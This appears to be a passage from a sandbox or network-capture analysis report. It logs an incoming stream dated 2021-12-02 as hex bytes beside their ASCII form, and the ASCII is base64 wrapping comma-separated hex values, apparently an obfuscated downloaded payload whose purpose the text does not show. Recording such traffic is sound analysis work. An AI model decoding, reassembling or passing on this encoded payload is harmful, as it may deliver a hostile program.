gREYsYEY3LGBENyxgRjgsYDM1LGA3RSxgOEYsYERGLGA5MixgREEsYENFLGA3RSxgOEQsYDVGLGBFMyxgOUYsYDIwLGA1OCxgOEYsYDdGLGBENyxgNUYsYEUzLGBENyxgRjgsYDVCLGAwOCxgRUUsYEQ5LGBDNSxgQUYsYEYxLGA2QixgRkMsYDkyLGAyOSxgRkQsYDlGLGBERSxgREQsYEE3LGBFRixgN0UsYDZELGBGQSxgRjksYDc3LGBFRC
2021-12-02 17:26:37 UTC	23	IN	Data Raw: 4c 47 42 43 52 53 78 67 4e 30 59 73 59 45 56 44 4c 47 41 79 4e 79 78 67 4e 30 55 73 59 44 68 45 4c 47 41 31 52 69 78 67 4e 6a 4d 73 59 44 64 42 4c 47 41 30 51 79 78 67 52 54 6b 73 59 44 42 45 4c 47 42 44 4d 69 78 67 4e 30 49 73 59 44 68 43 4c 47 41 33 52 53 78 67 52 6b 55 73 59 44 41 32 4c 47 42 43 52 69 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4e 6b 49 73 59 45 5a 44 4c 47 41 33 4d 53 78 67 4e 7a 63 73 59 45 45 34 4c 47 41 30 52 69 78 67 51 54 49 73 59 45 55 31 4c 47 41 78 52 69 78 67 52 6b 59 73 59 44 6c 43 4c 47 41 31 4d 43 78 67 4e 6b 4d 73 59 45 5a 45 4c 47 41 33 51 69 78 67 52 44 45 73 59 45 52 47 4c 47 42 43 52 69 78 67 52 55 51 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4e 6b 49 73 59 45 5a 44 4c 47 41 7a 4e 69 78 67 52 6a 51 73 59 45 51 Data Ascii: LGBCRSxgN0YsYEVDLGAyNyxgN0UsYDhELGA1RixgNjMsYDdBLGA0QyxgRTksYDBELGBDMixgN0IsYDhCLGA3RSxgRkUsYDA2LGBCRixgRkIsYEFGLGBGMSxgNkIsYEZDLGA3MSxgNzcsYEE4LGA0RixgQTIsYEU1LGAxRixgRkYsYDlCLGA1MCxgNkMsYEZELGA3QixgRDEsYERGLGBCRixgRUQsYEFGLGBGMSxgNkIsYEZDLGAzNixgRjQsYEQ
2021-12-02 17:26:37 UTC	24	IN	Data Raw: 6b 49 73 59 45 5a 44 4c 47 41 78 51 53 78 67 51 6b 59 73 59 45 4e 47 4c 47 41 79 4d 79 78 67 51 54 49 73 59 44 4e 43 4c 47 42 47 4d 53 78 67 51 7a 51 73 59 45 5a 47 4c 47 41 30 4f 43 78 67 51 6a 67 73 59 45 5a 44 4c 47 42 46 4f 53 78 67 4d 44 51 73 59 45 56 47 4c 47 41 35 52 69 78 67 51 54 41 73 59 45 4e 47 4c 47 42 47 52 53 78 67 4e 44 67 73 59 44 5a 42 4c 47 41 35 4d 79 78 67 52 44 41 73 59 44 56 44 4c 47 42 47 52 43 78 67 4d 54 6b 73 59 45 4a 47 4c 47 41 77 4d 79 78 67 51 30 51 73 59 45 52 45 4c 47 41 78 4e 79 78 67 51 7a 51 73 59 44 55 33 4c 47 41 7a 4e 43 78 67 4d 6a 63 73 59 45 5a 47 4c 47 41 77 4f 43 78 67 4e 30 51 73 59 45 59 32 4c 47 41 35 51 69 78 67 52 6b 59 73 59 44 45 32 4c 47 42 43 52 69 78 67 51 7a 59 73 59 45 46 47 4c 47 42 47 4d 53 78 67 Data Ascii: kIsYEZDLGAxQSxgQkYsYENGLGAyMyxgQTIsYDNCLGBGMSxgQzQsYEZGLGA0OCxgQjgsYEZDLGBFOSxgMDQsYEVGLGA5RixgQTAsYENGLGBGRSxgNDgsYDZBLGA5MyxgRDAsYDVDLGBGRCxgMTksYEJGLGAwMyxgQ0QsYERELGAxNyxgQzQsYDU3LGAzNCxgMjcsYEZGLGAwOCxgN0QsYEY2LGA5QixgRkYsYDE2LGBCRixgQzYsYEFGLGBGMSxg
2021-12-02 17:26:37 UTC	25	IN	Data Raw: 42 45 4d 53 78 67 52 55 59 73 59 44 4e 47 4c 47 41 79 4d 53 78 67 51 6b 55 73 59 45 5a 45 4c 47 41 78 4e 79 78 67 4e 6a 6b 73 59 44 68 44 4c 47 41 35 4e 79 78 67 51 7a 51 73 59 44 52 43 4c 47 41 33 52 69 78 67 4d 6b 51 73 59 44 64 45 4c 47 42 47 4e 69 78 67 4d 55 59 73 59 45 4a 46 4c 47 42 47 4f 53 78 67 4d 7a 55 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 6b 59 73 59 44 67 7a 4c 47 41 33 4f 43 78 67 4e 6b 49 73 59 44 52 46 4c 47 41 35 52 69 78 67 52 6b 59 73 59 45 4e 43 4c 47 42 44 4e 43 78 67 4e 7a 63 73 59 45 4a 47 4c 47 41 34 4d 69 78 67 4e 6a 41 73 59 45 5a 47 4c 47 41 31 4e 69 78 67 4d 7a 51 73 59 45 55 32 4c 47 42 47 52 69 78 67 4f 54 45 73 59 44 59 77 4c 47 42 47 52 43 78 67 4f 55 55 73 59 45 59 30 4c 47 42 47 51 69 78 67 4d 6b 59 73 59 44 49 31 4c Data Ascii: BEMSxgRUYsYDNGLGAyMSxgQkUsYEZELGAxNyxgNjksYDhDLGA5NyxgQzQsYDRCLGA3RixgMkQsYDdELGBGNixgMUYsYEJFLGBGOSxgMzUsYDdFLGA4RCxgRkYsYDgzLGA3OCxgNkIsYDRFLGA5RixgRkYsYENCLGBDNCxgNzcsYEJGLGA4MixgNjAsYEZGLGA1NixgMzQsYEU2LGBGRixgOTEsYDYwLGBGRCxgOUUsYEY0LGBGQixgMkYsYDI1L
2021-12-02 17:26:37 UTC	27	IN	Data Raw: 73 59 45 45 7a 4c 47 41 33 4e 69 78 67 52 44 63 73 59 44 4d 30 4c 47 42 42 52 69 78 67 4e 30 59 73 59 44 4e 47 4c 47 42 43 4e 53 78 67 4d 7a 6b 73 59 44 41 7a 4c 47 42 45 52 69 78 67 4d 54 41 73 59 44 52 46 4c 47 41 33 52 69 78 67 4d 45 45 73 59 45 51 78 4c 47 42 46 4d 43 78 67 4e 55 49 73 59 45 4d 30 4c 47 42 47 52 69 78 67 4d 45 59 73 59 44 67 34 4c 47 41 31 4e 79 78 67 52 6b 59 73 59 44 42 47 4c 47 42 44 4d 69 78 67 52 55 59 73 59 44 42 43 4c 47 42 46 4d 69 78 67 52 45 59 73 59 44 6c 47 4c 47 41 79 4d 43 78 67 52 45 55 73 59 45 5a 42 4c 47 42 46 4e 79 78 67 4f 44 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 45 45 73 59 44 4e 47 4c 47 41 34 4d 43 78 67 4e 7a 67 73 59 44 6b 78 4c 47 41 32 4e 43 78 67 52 55 59 73 59 44 5a 47 4c 47 42 42 4e 79 78 67 52 6a Data Ascii: sYEEzLGA3NixgRDcsYDM0LGBBRixgN0YsYDNGLGBCNSxgMzksYDAzLGBERixgMTAsYDRFLGA3RixgMEEsYEQxLGBFMCxgNUIsYEM0LGBGRixgMEYsYDg4LGA1NyxgRkYsYDBGLGBDMixgRUYsYDBCLGBFMixgREYsYDlGLGAyMCxgREUsYEZBLGBFNyxgODgsYEY3LGBGRixgREEsYDNGLGA4MCxgNzgsYDkxLGA2NCxgRUYsYDZGLGBBNyxgRj
2021-12-02 17:26:37 UTC	28	IN	Data Raw: 4d 79 78 67 51 7a 59 73 59 45 5a 45 4c 47 42 46 51 69 78 67 4d 54 45 73 59 45 4a 45 4c 47 42 42 52 53 78 67 51 54 67 73 59 45 56 45 4c 47 41 32 52 69 78 67 4e 44 6b 73 59 45 49 30 4c 47 42 47 4f 43 78 67 51 54 4d 73 59 45 45 35 4c 47 42 46 52 43 78 67 4e 55 59 73 59 44 51 32 4c 47 41 7a 51 79 78 67 52 6a 63 73 59 44 68 43 4c 47 41 77 4f 43 78 67 51 30 55 73 59 45 4a 47 4c 47 41 30 4e 69 78 67 52 6a 4d 73 59 45 59 35 4c 47 42 42 52 69 78 67 52 44 41 73 59 45 4a 44 4c 47 42 47 52 69 78 67 4d 7a 49 73 59 45 45 79 4c 47 42 46 52 43 78 67 4d 55 59 73 59 44 51 31 4c 47 42 43 51 79 78 67 52 6a 67 73 59 45 56 47 4c 47 41 78 4d 69 78 67 4d 45 51 73 59 45 5a 46 4c 47 41 7a 4e 69 78 67 52 54 49 73 59 45 56 47 4c 47 42 47 52 69 78 67 4f 55 4d 73 59 45 59 77 4c 47 42 Data Ascii: MyxgQzYsYEZELGBFQixgMTEsYEJELGBBRSxgQTgsYEVELGA2RixgNDksYEI0LGBGOCxgQTMsYEE5LGBFRCxgNUYsYDQ2LGAzQyxgRjcsYDhCLGAwOCxgQ0UsYEJGLGA0NixgRjMsYEY5LGBBRixgRDAsYEJDLGBGRixgMzIsYEEyLGBFRCxgMUYsYDQ1LGBCQyxgRjgsYEVGLGAxMixgMEQsYEZFLGAzNixgRTIsYEVGLGBGRixgOUMsYEYwLGB
2021-12-02 17:26:37 UTC	29	IN	Data Raw: 45 5a 44 4c 47 42 44 52 53 78 67 51 6b 59 73 59 45 4d 7a 4c 47 42 45 4d 69 78 67 4d 7a 63 73 59 45 4d 7a 4c 47 41 34 51 69 78 67 52 45 59 73 59 45 5a 44 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 56 45 4c 47 41 33 4e 69 78 67 52 55 49 73 59 45 52 47 4c 47 41 35 51 53 78 67 52 55 4d 73 59 45 56 47 4c 47 41 31 52 69 78 67 52 6a 49 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4e 6a 59 73 59 45 4a 47 4c 47 42 47 4f 53 78 67 4f 44 49 73 59 44 4d 79 4c 47 41 34 51 79 78 67 4d 55 51 73 59 44 55 7a 4c 47 42 47 51 79 78 67 51 54 63 73 59 44 49 79 4c 47 41 34 51 79 78 67 52 6b 4d 73 59 44 63 7a 4c 47 41 33 52 69 78 67 4f 55 59 73 59 44 4e 47 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 63 30 4c 47 42 47 52 53 78 67 4d 55 49 73 59 45 5a 44 4c 47 41 32 51 69 78 67 4e 55 59 73 Data Ascii: EZDLGBDRSxgQkYsYEMzLGBEMixgMzcsYEMzLGA4QixgREYsYEZDLGAzNyxgRkUsYDVELGA3NixgRUIsYERGLGA5QSxgRUMsYEVGLGA1RixgRjIsYDlCLGBGRixgNjYsYEJGLGBGOSxgODIsYDMyLGA4QyxgMUQsYDUzLGBGQyxgQTcsYDIyLGA4QyxgRkMsYDczLGA3RixgOUYsYDNGLGBFQyxgOEIsYDc0LGBGRSxgMUIsYEZDLGA2QixgNUYs
2021-12-02 17:26:37 UTC	31	IN	Data Raw: 78 67 4e 6b 59 73 59 44 4d 32 4c 47 42 42 52 69 78 67 4e 30 59 73 59 44 51 79 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 56 45 4c 47 41 35 52 43 78 67 52 44 63 73 59 44 64 47 4c 47 41 77 4d 53 78 67 4e 55 55 73 59 45 5a 47 4c 47 41 32 52 43 78 67 52 6b 55 73 59 45 4a 45 4c 47 42 43 52 69 78 67 52 6a 41 73 59 45 56 47 4c 47 41 30 4f 53 78 67 4f 55 49 73 59 44 4e 47 4c 47 42 47 52 69 78 67 52 45 59 73 59 45 49 35 4c 47 42 47 4e 43 78 67 51 7a 63 73 59 44 4e 45 4c 47 42 42 4d 79 78 67 52 6a 6b 73 59 45 52 42 4c 47 42 43 4d 69 78 67 52 6a 4d 73 59 44 4d 31 4c 47 42 42 4d 79 78 67 51 55 4d 73 59 44 55 79 4c 47 42 46 4e 79 78 67 52 44 55 73 59 45 5a 47 4c 47 41 78 4e 43 78 67 4d 44 45 73 59 45 55 78 4c 47 41 79 52 69 78 67 52 6b 55 73 59 45 55 35 4c 47 42 45 52 Data Ascii: xgNkYsYDM2LGBBRixgN0YsYDQyLGBBRixgRkYsYEVELGA5RCxgRDcsYDdGLGAwMSxgNUUsYEZGLGA2RCxgRkUsYEJELGBCRixgRjAsYEVGLGA0OSxgOUIsYDNGLGBGRixgREYsYEI5LGBGNCxgQzcsYDNELGBBMyxgRjksYERBLGBCMixgRjMsYDM1LGBBMyxgQUMsYDUyLGBFNyxgRDUsYEZGLGAxNCxgMDEsYEUxLGAyRixgRkUsYEU5LGBER
2021-12-02 17:26:37 UTC	32	IN	Data Raw: 7a 4c 47 42 44 52 53 78 67 4f 55 49 73 59 44 64 47 4c 47 41 77 51 69 78 67 52 45 55 73 59 45 5a 44 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 67 7a 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 49 7a 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 59 79 4c 47 42 45 4e 79 78 67 4e 30 4d 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 51 79 78 67 4e 44 4d 73 59 44 67 35 4c 47 42 45 4e 69 78 67 4f 55 59 73 59 45 51 33 4c 47 42 43 52 69 78 67 51 6b 59 73 59 45 4a 46 4c 47 42 47 51 53 78 67 4f 44 63 73 59 44 55 79 4c 47 41 34 4d 69 78 67 51 54 67 73 59 45 59 7a 4c 47 42 46 51 53 78 67 4d 54 55 73 59 44 56 46 4c 47 42 47 52 43 78 67 4d 7a 55 73 59 45 5a 47 4c 47 42 45 4f 53 78 67 4f 54 63 73 59 45 59 33 4c 47 42 45 4d 69 78 67 51 6b 59 73 59 45 Data Ascii: zLGBDRSxgOUIsYDdGLGAwQixgREUsYEZDLGA1QixgRkUsYDgzLGBFRixgRkUsYDIzLGBFOSxgNUYsYEYyLGBENyxgN0MsYEZCLGBCNyxgRjQsYERGLGBGQyxgNDMsYDg5LGBENixgOUYsYEQ3LGBCRixgQkYsYEJFLGBGQSxgODcsYDUyLGA4MixgQTgsYEYzLGBFQSxgMTUsYDVFLGBGRCxgMzUsYEZGLGBEOSxgOTcsYEY3LGBEMixgQkYsYE
2021-12-02 17:26:37 UTC	33	IN	Data Raw: 52 6b 59 73 59 45 4d 7a 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 44 52 47 4c 47 41 77 52 53 78 67 4e 7a 41 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 4f 44 67 73 59 45 49 7a 4c 47 41 33 52 53 78 67 4f 54 63 73 59 45 52 47 4c 47 42 45 51 53 78 67 52 6a 45 73 59 45 4d 32 4c 47 41 35 52 69 78 67 4e 44 41 73 59 44 4d 34 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 4a 47 4c 47 41 30 4d 53 78 67 52 6a 67 73 59 45 5a 42 4c 47 42 43 52 69 78 67 4f 44 51 73 59 44 63 34 4c 47 42 47 4e 53 78 67 4d 7a 63 73 59 44 55 35 4c 47 41 33 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 4e 69 78 67 51 6b 59 73 59 45 56 43 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 45 49 78 4c 47 42 43 52 69 78 67 4d 44 51 73 59 45 59 78 4c 47 41 33 52 69 78 67 52 6b 51 73 59 44 49 32 4c 47 42 43 52 69 78 Data Ascii: RkYsYEMzLGA3RixgRkMsYDRGLGAwRSxgNzAsYEZFLGAxMyxgODgsYEIzLGA3RSxgOTcsYERGLGBEQSxgRjEsYEM2LGA5RixgNDAsYDM4LGBGRixgREEsYEJGLGA0MSxgRjgsYEZBLGBCRixgODQsYDc4LGBGNSxgMzcsYDU5LGA3RixgRjQsYDdGLGBBNixgQkYsYEVCLGA3RixgRkMsYEIxLGBCRixgMDQsYEYxLGA3RixgRkQsYDI2LGBCRix
2021-12-02 17:26:37 UTC	34	IN	Data Raw: 47 42 45 52 69 78 67 4f 54 63 73 59 44 56 46 4c 47 42 47 52 69 78 67 4f 55 49 73 59 44 4e 43 4c 47 42 42 52 69 78 67 52 6b 59 73 59 44 5a 46 4c 47 41 33 4f 43 78 67 52 6b 51 73 59 45 4a 47 4c 47 42 47 51 53 78 67 51 55 51 73 59 44 64 47 4c 47 42 42 4e 79 78 67 52 6b 59 73 59 44 4a 42 4c 47 41 33 52 43 78 67 4d 7a 63 73 59 45 5a 47 4c 47 41 34 52 43 78 67 52 6b 4d 73 59 44 41 30 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 51 69 78 67 52 6b 4d 73 59 45 45 78 4c 47 41 79 4d 43 78 67 4f 54 6b 73 59 45 51 33 4c 47 42 47 51 69 78 67 4d 55 59 73 59 44 52 42 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 51 7a 4c 47 41 35 52 43 78 67 52 44 63 73 59 45 5a 47 4c 47 41 33 4d 79 78 67 51 7a 51 73 59 44 6c 43 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 46 47 Data Ascii: GBERixgOTcsYDVFLGBGRixgOUIsYDNCLGBBRixgRkYsYDZFLGA3OCxgRkQsYEJGLGBGQSxgQUQsYDdGLGBBNyxgRkYsYDJBLGA3RCxgMzcsYEZGLGA4RCxgRkMsYDA0LGBFRixgRkYsYEY1LGA5QixgRkMsYEExLGAyMCxgOTksYEQ3LGBGQixgMUYsYDRBLGBBRixgRkYsYEQzLGA5RCxgRDcsYEZGLGA3MyxgQzQsYDlCLGBGRixgRkEsYDFG
2021-12-02 17:26:37 UTC	36	IN	Data Raw: 51 73 59 45 51 78 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 5a 47 4c 47 41 7a 4e 79 78 67 52 6b 51 73 59 44 49 78 4c 47 41 33 52 69 78 67 4f 45 4d 73 59 45 5a 47 4c 47 42 46 51 53 78 67 4d 44 55 73 59 45 4a 45 4c 47 42 47 51 53 78 67 4f 44 6b 73 59 44 55 78 4c 47 42 47 4f 43 78 67 51 6b 59 73 59 45 59 35 4c 47 41 77 4e 53 78 67 4d 6b 51 73 59 45 56 43 4c 47 41 33 4e 53 78 67 4e 55 55 73 59 44 64 45 4c 47 41 34 51 79 78 67 4e 54 63 73 59 44 64 47 4c 47 42 42 52 43 78 67 52 54 59 73 59 45 4e 47 4c 47 42 47 4f 53 78 67 4f 55 59 73 59 45 51 7a 4c 47 42 46 52 69 78 67 52 6b 51 73 59 45 51 32 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 59 33 4c 47 42 47 51 79 78 67 4e 54 63 73 59 44 52 47 4c 47 42 46 4f 53 78 67 52 44 55 73 59 44 46 47 4c 47 42 42 51 69 78 67 52 Data Ascii: QsYEQxLGBFOSxgNUYsYEZGLGAzNyxgRkQsYDIxLGA3RixgOEMsYEZGLGBFQSxgMDUsYEJELGBGQSxgODksYDUxLGBGOCxgQkYsYEY5LGAwNSxgMkQsYEVCLGA3NSxgNUUsYDdELGA4QyxgNTcsYDdGLGBBRCxgRTYsYENGLGBGOSxgOUYsYEQzLGBFRixgRkQsYEQ2LGBGRixgREEsYEY3LGBGQyxgNTcsYDRGLGBFOSxgRDUsYDFGLGBBQixgR
2021-12-02 17:26:37 UTC	37	IN	Data Raw: 47 4e 69 78 67 4e 55 59 73 59 44 51 32 4c 47 41 32 52 69 78 67 52 6b 59 73 59 45 46 46 4c 47 41 35 52 43 78 67 51 6a 63 73 59 45 5a 47 4c 47 41 31 4e 43 78 67 51 6b 4d 73 59 45 5a 45 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 44 64 46 4c 47 41 33 52 69 78 67 52 54 67 73 59 44 6c 47 4c 47 41 35 4f 43 78 67 52 6b 55 73 59 44 42 47 4c 47 42 47 52 69 78 67 51 7a 63 73 59 44 46 47 4c 47 42 47 52 69 78 67 4e 6a 55 73 59 45 59 77 4c 47 42 47 4e 69 78 67 4d 30 59 73 59 44 41 78 4c 47 42 43 51 69 78 67 52 6b 4d 73 59 45 4a 43 4c 47 42 45 4e 53 78 67 4d 45 59 73 59 45 4e 45 4c 47 42 46 51 69 78 67 52 6b 59 73 59 44 41 30 4c 47 42 43 52 43 78 67 52 6b 55 73 59 44 55 35 4c 47 42 46 4e 79 78 67 52 6a 55 73 59 44 4d 33 4c 47 41 33 4f 43 78 67 4d 30 51 73 59 45 52 43 4c 47 Data Ascii: GNixgNUYsYDQ2LGA2RixgRkYsYEFFLGA5RCxgQjcsYEZGLGA1NCxgQkMsYEZELGBGNyxgRkYsYDdFLGA3RixgRTgsYDlGLGA5OCxgRkUsYDBGLGBGRixgQzcsYDFGLGBGRixgNjUsYEYwLGBGNixgM0YsYDAxLGBCQixgRkMsYEJCLGBENSxgMEYsYENELGBFQixgRkYsYDA0LGBCRCxgRkUsYDU5LGBFNyxgRjUsYDM3LGA3OCxgM0QsYERCLG
2021-12-02 17:26:37 UTC	38	IN	Data Raw: 59 45 51 35 4c 47 42 47 4d 79 78 67 4e 55 59 73 59 44 49 77 4c 47 41 77 4d 53 78 67 4e 7a 6b 73 59 44 59 34 4c 47 41 7a 4d 43 78 67 52 6b 59 73 59 45 4e 45 4c 47 42 47 52 69 78 67 4d 44 55 73 59 45 4e 42 4c 47 41 33 4f 53 78 67 4e 7a 63 73 59 44 56 46 4c 47 42 47 52 43 78 67 51 30 49 73 59 45 59 78 4c 47 42 46 51 53 78 67 4f 55 59 73 59 45 5a 43 4c 47 41 77 4e 79 78 67 52 6b 59 73 59 45 51 30 4c 47 41 7a 52 69 78 67 4f 54 59 73 59 45 5a 46 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 4e 43 4c 47 41 30 52 69 78 67 52 6b 51 73 59 44 55 31 4c 47 41 30 4d 53 78 67 51 30 59 73 59 45 5a 47 4c 47 41 79 4f 43 78 67 4f 44 59 73 59 45 5a 45 4c 47 42 43 51 69 78 67 4d 55 45 73 59 44 63 31 4c 47 42 47 4d 43 78 67 4e 30 59 73 59 45 5a 45 4c 47 41 30 4e 69 78 67 52 6b 59 Data Ascii: YEQ5LGBGMyxgNUYsYDIwLGAwMSxgNzksYDY4LGAzMCxgRkYsYENELGBGRixgMDUsYENBLGA3OSxgNzcsYDVFLGBGRCxgQ0IsYEYxLGBFQSxgOUYsYEZCLGAwNyxgRkYsYEQ0LGAzRixgOTYsYEZFLGBEMyxgN0YsYENCLGA0RixgRkQsYDU1LGA0MSxgQ0YsYEZGLGAyOCxgODYsYEZELGBCQixgMUEsYDc1LGBGMCxgN0YsYEZELGA0NixgRkY
2021-12-02 17:26:37 UTC	40	IN	Data Raw: 43 78 67 52 55 51 73 59 45 5a 47 4c 47 42 46 4e 69 78 67 52 44 63 73 59 45 5a 46 4c 47 41 79 51 69 78 67 4e 55 59 73 59 45 45 32 4c 47 41 33 52 69 78 67 52 55 49 73 59 45 55 7a 4c 47 42 45 52 69 78 67 52 6a 41 73 59 45 59 33 4c 47 42 47 4e 79 78 67 4d 30 49 73 59 45 5a 46 4c 47 42 45 4e 79 78 67 4e 6a 6b 73 59 44 6b 32 4c 47 41 33 52 69 78 67 4e 45 59 73 59 45 46 43 4c 47 41 33 51 79 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 52 69 78 67 51 55 45 73 59 45 5a 47 4c 47 42 45 4e 43 78 67 51 30 55 73 59 45 46 43 4c 47 42 47 52 69 78 67 4d 6a 41 73 59 44 56 46 4c 47 42 47 52 43 78 67 4e 7a 55 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 6a 4d 73 59 45 52 47 4c 47 41 79 52 43 78 67 52 6b 51 73 59 45 52 45 4c 47 42 47 52 53 78 67 51 54 59 73 59 45 4a 47 4c 47 41 7a Data Ascii: CxgRUQsYEZGLGBFNixgRDcsYEZFLGAyQixgNUYsYEE2LGA3RixgRUIsYEUzLGBERixgRjAsYEY3LGBGNyxgM0IsYEZFLGBENyxgNjksYDk2LGA3RixgNEYsYEFCLGA3QyxgRkYsYEY1LGA5RixgQUEsYEZGLGBENCxgQ0UsYEFCLGBGRixgMjAsYDVFLGBGRCxgNzUsYEZGLGBERSxgQjMsYERGLGAyRCxgRkQsYERELGBGRSxgQTYsYEJGLGAz
2021-12-02 17:26:37 UTC	41	IN	Data Raw: 56 42 4c 47 41 78 4e 43 78 67 51 7a 45 73 59 44 4d 7a 4c 47 41 32 4f 43 78 67 51 30 59 73 59 45 4e 46 4c 47 42 46 51 69 78 67 51 6b 59 73 59 44 42 45 4c 47 41 31 52 53 78 67 4f 55 59 73 59 45 5a 47 4c 47 41 30 52 43 78 67 4f 45 59 73 59 44 64 46 4c 47 41 79 51 79 78 67 4e 55 51 73 59 45 5a 44 4c 47 42 45 4e 79 78 67 51 6b 59 73 59 45 4d 30 4c 47 41 31 51 69 78 67 52 6b 59 73 59 45 59 34 4c 47 42 43 52 43 78 67 4e 30 59 73 59 45 4e 43 4c 47 41 7a 52 69 78 67 4f 54 49 73 59 44 51 34 4c 47 42 47 52 43 78 67 4e 30 49 73 59 44 45 35 4c 47 41 78 4e 53 78 67 52 6a 59 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4f 54 45 73 59 44 4e 47 4c 47 41 31 4e 53 78 67 52 6b 59 73 59 44 51 30 4c 47 42 46 4e 79 78 67 52 44 55 73 59 44 64 47 4c 47 42 47 4e 79 78 67 51 6b 59 73 59 Data Ascii: VBLGAxNCxgQzEsYDMzLGA2OCxgQ0YsYENFLGBFQixgQkYsYDBELGA1RSxgOUYsYEZGLGA0RCxgOEYsYDdFLGAyQyxgNUQsYEZDLGBENyxgQkYsYEM0LGA1QixgRkYsYEY4LGBCRCxgN0YsYENCLGAzRixgOTIsYDQ4LGBGRCxgN0IsYDE5LGAxNSxgRjYsYDlCLGBGRixgOTEsYDNGLGA1NSxgRkYsYDQ0LGBFNyxgRDUsYDdGLGBGNyxgQkYsY
2021-12-02 17:26:37 UTC	42	IN	Data Raw: 67 51 6a 55 73 59 45 56 47 4c 47 41 33 51 53 78 67 52 55 49 73 59 45 45 34 4c 47 42 43 52 69 78 67 52 6a 63 73 59 44 5a 47 4c 47 42 47 4f 53 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 6c 45 4c 47 41 34 4e 53 78 67 4e 30 49 73 59 44 52 42 4c 47 41 34 51 69 78 67 4d 6a 4d 73 59 44 6c 45 4c 47 41 7a 4e 79 78 67 4d 45 59 73 59 45 59 77 4c 47 42 46 4e 69 78 67 4d 30 59 73 59 45 5a 42 4c 47 42 45 4e 79 78 67 52 6b 59 73 59 44 52 46 4c 47 42 45 52 69 78 67 4e 45 49 73 59 44 56 47 4c 47 42 43 51 79 78 67 52 6b 55 73 59 45 55 31 4c 47 42 43 52 69 78 67 4f 44 63 73 59 45 5a 47 4c 47 42 46 4e 69 78 67 51 55 59 73 59 44 49 32 4c 47 42 45 4e 53 78 67 4e 6a 45 73 59 44 67 7a 4c 47 41 35 51 53 78 67 52 45 59 73 59 45 5a 44 4c 47 41 31 4e 79 Data Ascii: gQjUsYEVGLGA3QSxgRUIsYEE4LGBCRixgRjcsYDZGLGBGOSxgRjQsYDM3LGBGRixgOEQsYDlELGA4NSxgN0IsYDRBLGA4QixgMjMsYDlELGAzNyxgMEYsYEYwLGBFNixgM0YsYEZBLGBENyxgRkYsYDRFLGBERixgNEIsYDVGLGBCQyxgRkUsYEU1LGBCRixgODcsYEZGLGBFNixgQUYsYDI2LGBENSxgNjEsYDgzLGA5QSxgREYsYEZDLGA1Ny
2021-12-02 17:26:37 UTC	44	IN	Data Raw: 4c 47 42 43 4f 53 78 67 52 6a 4d 73 59 45 55 32 4c 47 41 35 52 69 78 67 4f 44 59 73 59 44 4d 33 4c 47 42 47 52 69 78 67 51 30 59 73 59 45 4a 47 4c 47 42 46 4f 43 78 67 52 55 59 73 59 45 5a 45 4c 47 42 46 4d 79 78 67 52 44 49 73 59 45 59 79 4c 47 41 79 52 69 78 67 52 6b 59 73 59 45 56 43 4c 47 41 30 4e 69 78 67 4e 44 45 73 59 45 4d 33 4c 47 42 43 52 69 78 67 4d 7a 4d 73 59 44 4e 42 4c 47 41 33 52 53 78 67 52 54 41 73 59 44 41 30 4c 47 42 47 4f 43 78 67 4e 7a 63 73 59 44 67 32 4c 47 42 42 52 53 78 67 52 55 4d 73 59 45 4a 44 4c 47 42 47 52 53 78 67 4d 54 55 73 59 44 56 46 4c 47 42 47 52 69 78 67 4e 30 51 73 59 45 5a 46 4c 47 42 46 4f 43 78 67 4e 55 59 73 59 45 59 79 4c 47 42 45 52 69 78 67 51 54 51 73 59 45 5a 47 4c 47 41 30 4e 43 78 67 52 6a 4d 73 59 44 52 Data Ascii: LGBCOSxgRjMsYEU2LGA5RixgODYsYDM3LGBGRixgQ0YsYEJGLGBFOCxgRUYsYEZELGBFMyxgRDIsYEYyLGAyRixgRkYsYEVCLGA0NixgNDEsYEM3LGBCRixgMzMsYDNBLGA3RSxgRTAsYDA0LGBGOCxgNzcsYDg2LGBBRSxgRUMsYEJDLGBGRSxgMTUsYDVFLGBGRixgN0QsYEZFLGBFOCxgNUYsYEYyLGBERixgQTQsYEZGLGA0NCxgRjMsYDR
2021-12-02 17:26:37 UTC	45	IN	Data Raw: 6b 55 73 59 45 56 43 4c 47 42 46 4f 53 78 67 4e 6b 59 73 59 45 59 31 4c 47 41 34 51 69 78 67 4e 30 59 73 59 45 4a 47 4c 47 41 79 4d 43 78 67 4d 6a 51 73 59 44 63 34 4c 47 41 30 52 53 78 67 4f 55 51 73 59 45 5a 46 4c 47 41 32 4e 69 78 67 4e 7a 59 73 59 44 67 79 4c 47 41 35 52 69 78 67 4e 54 4d 73 59 44 6b 77 4c 47 42 45 52 43 78 67 4e 7a 6b 73 59 45 59 31 4c 47 41 32 52 69 78 67 51 7a 55 73 59 45 46 43 4c 47 41 78 52 69 78 67 52 6b 51 73 59 44 52 45 4c 47 41 32 52 69 78 67 52 6b 59 73 59 45 5a 45 4c 47 42 47 4e 43 78 67 52 45 55 73 59 45 4a 45 4c 47 41 33 52 69 78 67 4d 30 59 73 59 45 59 30 4c 47 41 78 51 79 78 67 4d 6b 55 